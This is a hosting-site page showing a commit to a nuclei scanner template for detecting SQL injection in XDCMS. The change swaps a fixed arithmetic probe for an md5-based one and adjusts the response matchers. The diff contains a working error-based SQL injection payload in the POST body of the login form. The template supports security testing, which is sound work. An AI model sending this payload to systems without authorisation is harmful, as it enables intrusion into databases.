daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update xdcms-sqli.yaml

patch-1
Ritik Chaddha 2022-06-30 08:48:00 +05:30 committed by GitHub
parent 28e6e03fc5
commit d81a48e31e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
vulnerabilities/other/xdcms-sqli.yaml
View File

@ -8,6 +8,9 @@ info:
- https://www.uedbox.com/post/35188/ - https://www.uedbox.com/post/35188/
tags: sqli,xdcms tags: sqli,xdcms
variables:
num: "999999999"
requests: requests:
- method: POST - method: POST
path: path:
@ -15,7 +18,7 @@ requests:
headers: headers:
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
body: | body: |
username=dd' or extractvalue(0x0a,concat(0x0a,810663301*872821376))#&password=dd&submit=+%B5%C7+%C2%BC+ username=dd' or extractvalue(0x0a,concat(0x0a,md5({{num}})))#&password=dd&submit=+%B5%C7+%C2%BC+
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -27,10 +30,8 @@ requests:
- type: word - type: word
words: words:
- "707564257851522176" - '{{md5({{num}})}}'
- "XPATH syntax error:"
part: body part: body
condition: and
- type: status - type: status
status: status: